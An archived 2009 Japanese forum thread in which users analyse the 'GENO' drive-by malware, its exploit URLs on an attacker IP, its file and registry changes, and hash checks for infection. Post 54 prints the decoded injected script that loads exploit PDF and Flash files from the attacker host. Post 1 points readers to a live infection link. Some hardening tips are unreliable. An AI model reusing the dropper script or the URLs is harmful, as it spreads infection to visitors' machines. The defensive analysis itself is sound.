5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

GENOウイルススレ

1 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:09:39
(1)感染したWebページをひらく
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
(5)bufferOverrunでウィルス本体の起動を試行

以下が問題のURL、
"id=2"はpdfの脆弱性を利用し、
buffer overflowを引き起こさせ感染を試みる。(Adobe Collab overflow)
"id=3"はswf(Flash)の脆弱性を利用しoverflowを引き起こさせ、感染を試みる。
いずれも最新のFlash Playerの導入とPDF Readerを入れていれば問題なし(?)
hxxp://94.247.2.195/jquery.js
hxxp://94.247.2.195/news/?id=100
hxxp://94.247.2.195/news/?id=2
hxxp://94.247.2.195/news/?id=3

リンクは切れており現在無害(当環境では)


以下のリンクは生きており感染実験希望の方はドゾ
★危険ですので注意
hxxp://94.247.2.195/news/index.php

少しわかってること:
WINDOWSの正規ファイルを上書き(?)する可能性大

Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html


2 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:36:01
関連スレ

【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/l50

【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/l50

3 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:41:30
関連スレ

【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
http://tsushima.2ch.net/test/read.cgi/news/1239126066/l50

GENOなどのサイトでウイルス感染★8
http://tsushima.2ch.net/test/read.cgi/news/1239097279/l50

★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/l50

【ウィルス情報質問 総合スレッド★Part46】
http://pc11.2ch.net/test/read.cgi/sec/1224511070/690-

4 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:41:58
GENOの対応酷いな
まあ自力で駆除はかなり面倒だけど

5 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:51:40
GENOは被害者

6 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:52:14
Proxomitron用対策フィルタ。

[Patterns]
Name = "GENO Virus Killer"
Active = TRUE
Limit = 512
Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->"
Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"

7 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:56:32
>>1
おつ

8 :名無しさん@お腹いっぱい。:2009/04/08(水) 10:57:32
IIIII  NAXOS その6  IIIII
http://jfk.2ch.net/test/read.cgi/classical/1190386402/748

9 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:01:51
セキュリティ対策【危険ポートを閉じる】

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

Web-based DNS Randomness Test | DNS-OARC
https://www.dns-oarc.net/oarc/services/dnsentropy

を踏んでみて、もし万一「POOR」って表示されたら、
そのDNSはセキュリティ的に「もうだめぽ」ということ。

10 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:08:01
GENO以外にもあちこちで報告出てるなー

**** 価格比較のECナビ Part43 ****
http://gimpo.2ch.net/test/read.cgi/point/1238752206/84-120

11 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:09:52
ComboFix(Geekは可)は特定のサイトからのダウソはブロックされるね
DDSも起動せず。

ただComboFixで自動処理するとアカウントにログイン出来なくなる
(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)


駆除失敗(・ω・`)

12 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:35:19
GENO系の最新情報集めてるスレない?
ニュー速がいちばん人居るのかな

13 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:44:32
ニュー速だね。
>>8>>10の他にも感染サイトの情報がカキコされてる。

14 :名無しさん@お腹いっぱい。:2009/04/08(水) 11:59:04
d
張り付いとくか…

15 :名無しさん@お腹いっぱい。:2009/04/08(水) 12:24:45
とりあえずまとめる場所だけ作ったからだれか編集よろしく
http://www29.atwiki.jp/geno/

16 :名無しさん@お腹いっぱい。:2009/04/08(水) 12:47:26
>>11
hijackthis、RSITあたりでログ取っても感染ファイルが見当たらない
何でだろう

モニタリングソフト使って把握するしかないんか
めんどくせ

17 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:33:48
PC通販サイト「GENO」のサイトに改ざんの疑い
ttp://internet.watch.impress.co.jp/cda/news/2009/04/07/23057.html

PC通販ショップGENOのサイトにマルウェアが仕込まれる
ttp://www.excite.co.jp/News/column/20090407/Slashdot_09_04_07_042220.html

アイティメディア株式会社 : 当社サイトにて掲載した広告のリンク先ページにおけるウイルス感染について ご報告と対処のお願い
ttp://corp.itmedia.co.jp/corp/notice/20090407.html

18 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:44:23
>>2-3

ウイルス注意!お前等しばらくzipやリンク踏むなよ!!
http://takeshima.2ch.net/test/read.cgi/news4vip/1239059037/

19 :名無しさん@お腹いっぱい。:2009/04/08(水) 13:49:58
今感染してみたけど動作してんのか?
ファイル生成→自身を削除
で終わりなんだけど
ただIEが凄い不安定だ

20 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:09:22
どんな挙動をするか本当の所はまだ判明してないのに…
これからの報告に期待する
人柱乙

21 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:13:39
仮想で踏んで分析してくれてるんじゃまいか

22 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:35:13
>>18
踏んでいいの?怖いんだけど

23 :名無しさん@お腹いっぱい。:2009/04/08(水) 14:37:54
GENO ウイルス に一致する日本語のページ 約 42,800 件中 51 - 100 件目 (0.21 秒)
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50

24 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:14:22
SDFixも動かない
悪玉ファイルは見つからない
どうなってんの?

25 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:24:14
http://www.security-next.com/010247.html

26 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:38:47
PDF ReaderもFlash Player最新だったんだけどなあ

27 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:44:40
adobeのPDF導入してなくても感染したって話もあったからコワイね。
未だに挙動含めてはっきりしたことわからない。

28 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:51:17
今回は既知の脆弱性を突いたウィルスだったけど、
これが未対応・未発表の脆弱性とかだったらと思うとブルブル

29 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:53:34
サイトを乗っ取られる会社がアホなんだよ。


30 :名無しさん@お腹いっぱい。:2009/04/08(水) 15:54:01
sqlsodbc.chmファイルが上書きされて
乗っ取られた正規ファイルがsqlsodbc.chmにアクセスしまくってるんだけど
もう諦める。

31 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:27:40
GENO ウイルス ニュース検索結果
http://news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n

32 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:35:14
>9

Source Port Randomness: GREAT 

All

33 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:43:05
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
http://tsushima.2ch.net/test/read.cgi/news/1239126066/

【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/

34 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:46:43
せめてオンラインスキャン程度薦めてくれれば擁護のしようもあるのだが

35 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:52:09
>>19
レジストリエディタの起動を阻止したり、自身を削除する前にいろいろやってる模様。
面倒くさいので、OS入れなおした。

36 :名無しさん@お腹いっぱい。:2009/04/08(水) 16:54:14
行徳のSTEPの時代からひいきにしてたのに実に残念だ

37 :名無しさん@お腹いっぱい。:2009/04/08(水) 17:54:16
ν速からきますた。。。


>>19,35
ν速のスレでうpされたLa.exeのバイナリをUPX圧縮を解除してバイナリエディタで中を覗いたけど、
どうもLa.exeではKドライブにある _t というフォルダを消して、_tフォルダ内のu.batを消している感じの文字列が見えた。

恐らくこの _t というフォルダの中がどうなっているのかを調べたら
具体的にどんな内容が盗み出されているかが判るんじゃないかなって思うよ。

ただ、ちょっと疑問なのはν速のスレで感染したらしき人の報告ではCドライブの直下にu.batが出来ていたらしいって事。

もしかするとこのEXEの前に予めジャンクションを張っているのか、KドライブにCドライブのどこかにある_tフォルダを
SUBSTしてるのかも知れない。

感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。

38 :名無しさん@お腹いっぱい。:2009/04/08(水) 17:57:38
× 感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。
○ 感染した状態で即効でこの _t フォルダの中身を調べてしまえばよいのかと。

訂正。

39 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:02:23
>>37
La.exeとGENOウイルスは同じものかい?

40 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:04:38
>>37
そんな感じだけど解析困難だよ

41 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:07:36
>>39
それはおいらが食らった訳じゃないから確証は持てない。
あくまで自称食らった人がうpしたものを解析しただけなんで。

42 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:11:13
Kドライブは汎用機だな
>>39
ランダム名

43 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:13:06
MDLに94.247.*.*
が沢山あるな。
登録日見ると今年に入って頑張って流行らせようとしてるみたい。


44 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:14:34
>>40
恐らく食らっててCPU負荷高い状況だと難しいと思う。
自ら言っておいてこんな事言うのはなんだけど。

45 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:17:02
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
u.batあたりの挙動はここにまとめられてる

46 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:18:39
>>39
まったく同じとは言い切れないがほぼ一緒か?。
GENOとcrestronjapan.com、>>1の生きているリンクから踏んだけど
どれも共通してu.batが生成されたから同じような動きをしてる希ガス。

47 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:27:01
このウイルスに感染すると、
・特定のサイトに接続できなくなる
・特定の駆除ソフト、ログ取得ソフトがブロックされる(DDS、SDFix類がブロックされる)
・レジストリエディタが起動しない(リネームすることにより回避可能)
・ネットブラウジングが困難になる。(問題発生しまくり)
・sqlsodbc.chmにWindowsの正規プログラム(?)がやたらとアクセスしてる
・Windowsの正規プログラムがsqlsodbc.chmを作成したりする。

おれの環境では不正なサイトにアクセスは確認できなかった
sqlsodbc.chm←これヘルプファイルだし特に危険じゃないと思うんだけど
何なんだ

48 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:32:00
>>47
HTMLヘルプの脆弱性でも狙ってるとか

49 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:33:04
>>47
あくまで推測だけど、PDFファイルやFlashファイルでバッファオーバーフローの脆弱性を突いたみたいに
HTMLヘルプのhh.exeにも同じ様な脆弱性があって、それを突いてくるファイルなのかと。

50 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:35:31
AMD64のCPUに替えれば無問題

51 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:38:00
- Files Created:
C:\bgrn.mym
C:\u.bat

- Files Read:
C:\WINDOWS\system32\sqlsodbc.chm

- Files Modified:
C:\WINDOWS\system32\sqlsodbc.chm
C:\bgrn.mym
C:\u.bat

- Files Deleted:
C:\_.t
C:\u.bat

52 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:38:01
CVE-2009-0119だったりして

53 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:44:24
>>47
ウチの環境じゃ
・IEが死にまくる
・OEが死にまくる
・cmd.exeが起動しない
っていう症状が出てる。


54 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:44:43
hxxp://94.247.2.195/news/index.php
↓デコードしてみた
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{obj=new ActiveXObject("PDF.PdfCtrl");
}catch(e){}}if(obj)document.write('<embed src="http://94.247.2.195/news/?id=2" width=100 height=100 type="application/pdf"></embed>');
try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");
}catch(e){}if(FV&&(FV[2]<124))document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="http://94.247.2.195/news/?id=3"/><param name="quality" value="high"/>
<param name="bgcolor" value="#ffffff"/><embed src="http://94.247.2.195/news/?id=3"/></embed></object>');document.write("</div>");

55 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:47:03
>>53
windows update繋がります?

56 :54:2009/04/08(水) 18:47:23
↑リンク外すの忘れてました;;

57 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:48:43
>>55
繋がったような希ガス
今当該機器はオフラインなので確認できない

ただシステムログにWindowsアップデート関連のエラーが一件出てた

58 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:49:05
オイオイ

59 :名無しさん@お腹いっぱい。:2009/04/08(水) 18:58:44
いろいろExplorer.exe壊したw

60 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:04:21
la.exeを実行したら
sqlsodbc.chm
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
を書き換えるよとcomodoさんが言った

61 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:06:39
WikiのKaspersky、Nortonで駆除で来たってネタだろw
バリバリ感染した状態でANTIDOTE(カスペエンジン)最新にして
スキャンかけたけど問題のjsファイルしか引っかからなかったぞw
当然症状は治らず

つまりアンチウイルスは役に立たない
必死にオンラインスキャンしてるくらいだったらリカバリーするべき

62 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:14:26
カスペのオンラインスキャンをやろうと思ったのですが、

アプリケーションのデジタル証明にエラーがあります。〜

と出るのですが、気にせず実行してよいものなのでしょうか?
それとも皆様はこの表示出ません?

63 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:14:54
自作PC板
【馬鹿】GENOを語るスレ23【ID版に移動】
http://pc11.2ch.net/test/read.cgi/jisaku/1231510507/l50
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/l50

64 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:15:08
Windows NT

( ゚Д゚)ポカーン

65 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:17:37
>>52
マイクロソフトWindows CHMファイル処理バッファオーバーフロー脆弱性

問題のため、CHMファイルを処理するとき、マイクロソフトWindowsはバッファオーバーフロー脆弱性の傾向があります。
首尾よくこの問題を利用するのに、攻撃者は、メモリを崩壊させて、これらのファイルに関連しているアプリケーションを墜落させるでしょう。
この問題の本質を考えて、また、攻撃者は勝手な規準を実行できるかもしれませんが、これは確認されていません。
Windows XP Service Pack3は被害を受け易いです。 また、他のバージョンは影響を受けるかもしれません。

66 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:21:42
>>64

67 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:34:11
>>60
で、実害は?

68 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:35:55
今のところの感染確認方法は「sqlsodbc.chm」のタイムスタンプが最近だったらm9(^Д^)
古かったら⊂(^ω^)⊃セフセフ か

69 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:37:09
未だ修正が行われない crestronjapan.com だが、ヘッダにこんなんあった。

<meta name="generator" content="Movable Type Open Source 4.12" />


70 :名無しさん@お腹いっぱい。:2009/04/08(水) 19:37:40
現状
>>47みたいな症状が確認されてる?のかな

特定のサイトに繋がらないってのが味噌なのかもしれん



71 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:09:37
なるほど、メモリ上のexeだけ書き換えられるのね。


72 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:09:52
>>70
【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/

887 名前:名無しさん[sage] 投稿日:2009/04/08(水) 19:48:23 0
家のPCがモロ感染してたので人柱ってみた。。

結論から言うと、感染者は再インスコしかなさそう。
所要システムファイルが書き換えられてて、修復のしようがない。

で、元凶の書き換え元ファイルはまだ特定できないんだが、
とりあえずC:\WINDOWS\agh.givが作成されてて、
消しても即生成されるようなので、同名ファイルがある人は注意ね。

また追って人柱ってみます。。

889 名前:887[sage] 投稿日:2009/04/08(水) 19:52:50 0
ちなみに、カスペやトレンドマイクロのオンラインスキャンでは全く感知せず。
新種のウイルスだと思われ。

今んとこ、書き換えられてる(メモリ上書きされてる?)プロセスは以下の通り。
svchost.exe
spoolsv.exe
exproler.exe
alg.exe
winlogon.exe

おそらくファイル自体は書き換えられてない。
だからアンチウイルスでもヒットしない。

ちなみに、cmd.exeを実行したら一気に発祥したので、
疑いのある人はcmd.exeを実行しないように。

73 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:09:57
>>69
ほう。OSやhttpdはバラバラなようだから、MT(もしくはDB)の脆弱性なのか?

74 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:12:37
>>68
少なくてもCHMファイルの作成日時もしくは更新日時がウィルスを踏んで食らった時刻か、
丁度9時間ズレの時刻になってると感染確定だね。

ただ、このCHMファイルが書き換えられていなくても、
他の書き換えが行われている可能性もゼロじゃないから、
この件だけで感染の判断材料に使うのは危険だと思う。

75 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:15:30
>>69
なんかOSやHTTP鯖の種類もバラバラだけど、
CMSの種類までバラバラなのか。
Genoは確かWordPressだったでしょ。

76 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:23:20
上のと動作が微妙に違うみたい
ttp://anubis.iseclab.org/?action=result&task_id=1a4c445790ab425a43dc7bb547f59aa74&format=html

77 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:26:48
>>75
進入経路が確定しないってのもヤだよな。

http://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
ここで紹介されてるパターンだと、FTPのパスワードが盗まれた(簡単過ぎた?)ことが
原因らしいが・・・・・。


未だサイトを閉じないパピーヌと日本クレストロンはどう対処する気なんだ。
クレストロンは鯖が米国にあるっぽいので向こうの営業時間(明日未明)にならんと
対策されん希ガス。

78 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:29:05
>>74
踏んだ時刻を大体覚えてればCドライブの一週間以内に変更されたファイルを
検索して踏んだ時刻近辺に変更されたファイルを精査すれば感染/非感染が分かりそう。
自分のをざっとやってみたけど踏んだ時間近辺で変更されてるのは専ブラのdatと
avastのログファイルくらいだった。

chmはヘルプファイルだから最近インスコしたソフトがなければそう簡単に更新されたり
しないから分かり易いね。

79 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:34:05
だからメモ帳起動するとnotepad.exeが変な動きしたりしてたのか。
notepad.exe
ApntEx.exe
imapi.exe
lsass.exe
他...
結論は>>71か。
ウイルスの主な活動は乗っ取った正規プログラムで、
後はその家庭で作成したファイルを削除しちゃうからログ取得ツールにも表れないわけだ


80 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:36:12
>>77
もしかすると前にν速のスレでおいらが半分冗談で言ってたんだけど、
ウィルス付きメール等で事前に内部的にパスワードが盗まれて
その後堂々とFTPログインされて好き勝手に書き換えられたのかも知れないね。

あまりに杜撰すぎるけど、他で爆発的に感染していない所を見ると
この種の致命的なオペレーションレベルでのミスを見過ごしてこーいう事態を招いたのかも知れないね。

いずれにしても食らった楽天のショップが特定の1件だけって所が妙だと個人的には思ってて、
単純に外部からアタックされてやられるのならもっと楽天のショップが大量に食らっててもおかしくない話だからね。

81 :60:2009/04/08(水) 20:41:52
アスロンでデータ実行防止してるPCのvirtualPC上のXPsp2で実行ね
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
は%実行フォルダ%\..\bcrg.rhn(名前はランダムかも)
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations

\??\C:\_.t


になってた
sqlsodbc.chm はファイルサイズが本来50727byteから1323byteへ。
タイムスタンプは多分変わらず作成日時と更新日時が2004/08/10

そのまま再起動するも異常に時間がかかるので電源off
セーフモードで再起動->システムの復元をしたがsqlsodbc.chmは改変されたまま

そのままsqlsodbc.chmを踏んでみたけど
mk::@MSITStore:C:\WINDOWS\system32\sqlsodbc.chm を開けません。
とダイアログが出るだけ

あとはわからん




82 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:44:46
>>80
一応海外にも被害は出てて拡散しているらしい
日本人は英語のスパムにはそうそう釣られないと思うんだよなあ

こんなのがあった
http://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/

83 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:46:56
>>81
CHMファイルのタイムスタンプはオリジナルのままなのか。。。

84 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:50:17
>>81
VPC動作したのか・・・orz

感染したと思いこんでるやつように確認方法として
・ブラウジング中によく落ちる
・sqlsodbc.chmが改変されていないか確かめてみる
↓みんなこの値?
(MD5 f639afde02547603a3d3930ee4bf8c12)

85 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:50:24
>>82
そこはさっき目を通したわ。
リンクが紫だw

昨夜明け方にラトビアのIP等を元にぐぐったら
3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。

86 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:51:23
>>84
sqlsodbc.chmはタイムスタンプじゃなくてハッシュで確認しないと駄目だね。これ。

87 :84:2009/04/08(水) 20:52:01
VPC上で動作したのか・・・orz
に訂正・・・

88 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:52:09
GENOウイルスが世界デビューしてる

89 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:59:27
これ拡大すんの?


90 :名無しさん@お腹いっぱい。:2009/04/08(水) 20:59:56
件のサイト群は見てないのに、Wikiに書いてあるcmd.exeが勝手に動いてて
メモリを消費してるという感染済みっぽい挙動を確認したんだけど
やっぱ報告されてないだけで世界的に感染してるHPがあるんかな。
暫くはまともにネット見れなさそうね。

91 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:00:22
>>84
だね>ハッシュ値

92 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:01:32
>>89
少しずつ改竄報告増えてるね。
もしリカバリしてもまたほかで踏みそうなきもする。

93 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:03:18
詳細が分かるまでVMで大人しくネットするしかないな

94 :84:2009/04/08(水) 21:06:31
だれかハッシュ値確認お願いしませう

95 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:12:38
>>84
同じ

96 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:12:58
>>94
MD5 (sqlsodbc.chm) = f639afde02547603a3d3930ee4bf8c12
XP,SP3

97 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:13:16
もとからsqlsodbc.chmなんてファイルがないんだが・・・

98 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:14:03
>>84
XP SP3
タイムスタンプが2004/08/05 21:00だが、ハッシュは同じ

99 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:14:30
>>84
無印XPにSP3を適用してWindowsUpdate 当てまくりで
何回かテストで踏んでるけど、全てNorton先生に撃退してもらってる環境。 
一致してる。詳細は↓の通り。

ついでに全然感染サイトを踏んでいないファイルサーバーのServer2003SP2のも
タイムスタンプこそ↓とは違うけどCRC32,MD5共に一致してる。

sqlsodbc.chm
C:\WINDOWS\system32
50,727バイト

作成日時
2001年8月27日 月曜日、21:00:00
更新日時
2001年8月27日 月曜日、21:00:00

CRC32
B61C7A80
MD5
F639AFDE02547603A3D3930EE4BF8C12

100 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:21:23
踏んでウイルス食らった後に、検出できるのか?
他スレで完全スルーしたって話でてるな・・

101 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:21:29
と思ったらちゃんとあったw
f639afde02547603a3d3930ee4bf8c12 c:\windows\system32\sqlsodbc.chm

102 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:27:32
adobeサイトでフラッシュとリーダーを更新しようとしたら
IE7がフリーズするんだけど感染してるのかな?
sqlsodbc.chmのハッシュは
f639afde02547603a3d3930ee4bf8c12 なんだけど・・・

103 : ◆N9P3SuvBPo :2009/04/08(水) 21:29:08
>99
特攻機で踏んだけど、作成日とか違えどサイズもハッシュもあなたのと同じです。

104 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:35:17
            /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ削除すりゃぁいいんだよ!!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /

105 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:45:48
VISTAは感染しないって本当なの?

106 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:49:46
>>105
だからまだウィルスの全貌が解明すらされていないのに
「○○なら大丈夫」っていう安易は発想はしないほうがいいよ。

無闇に怯えるのもアフォだけど、やたらに過信するのもヴァカだと思う。

107 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:57:33
GENOウイルスはなかった

108 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:57:59
>>90
Adobe ReaderやFlashが古い状態だと可能性あります
ちなみに踏んだURLを教えてくれると助かる
直接貼られると危ないんでリンク外れる程度におねがいします

もしくは他のウィルスに感染してたかです

109 :名無しさん@お腹いっぱい。:2009/04/08(水) 21:59:26
>>105
Genoの場合はUserAgentで振り分けがあって
Vistaは対象外っぽかった
気まぐれかもしれないので確実に安全とはいえない

110 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:03:14
http://news.goo.ne.jp/article/internet/business/it/iw2009040809-internet.html
PC通販サイト「GENO」のサイトに改ざんの疑い
INTERNET Watch2009年4月8日(水)00:30

111 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:06:22
>>105
こういう話もあるよ。
http://takeshima.2ch.net/test/read.cgi/news4vip/1239059037/448
448 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 20:05:12.93 ID:jaXpHGCM0

まぁかなり話題になってるから知ってるだろうけど
アドビ9.0以前の脆弱性を付いたウイルスだから、今のうちに
更新しとけ
ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
鬱陶しさ(おそらくウイルスの仕様)
vistaならセーフって解釈は間違いで、vistaでも更新かけてない奴はアウト
ソースは昨年11月から未更新の俺のvista

112 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:11:52
>>108
騒ぎが起こる前にReaderは9.1.0、Flashも10.0.22.87にしてあった。
踏んだURLは本当に気付いたらこうなってたので
どれが原因かは分からない。すまん

avast!で今チェックが終わったところだけど、感染0だったから
他のウィルスではない、と思う。あとでカスペルスキー等も試さないと…

あと、ついでだからsqlsodbc,chmのハッシュ値とかも書いておく
50,727 バイト
作成日時 2007年5月15日、16:26:18
更新日時 2006年3月2日、21:00:00
MD5   F639AFDE02547603A3D3930EE4BF8C12

113 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:12:00
84と同じなら99%感染してないと思う
GENO含めその他のサイトで同ウイルスの感染実験したが
必ずsqlsodbcは改変された
亜種にすぐに変わるようなウイルスじゃなさそうだし、
有効な確認手段だと思う
感染してる場合は“a”から始まるハッシュ値だった(メモしわすれたorz)

114 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:14:58
今調べたんですが、ハッシュってソフト入れてそれで見るんですよね?
初心者質問本当に申し訳ない。

115 :名無しさん@お腹いっぱい。:2009/04/08(水) 22:17:52
>>111
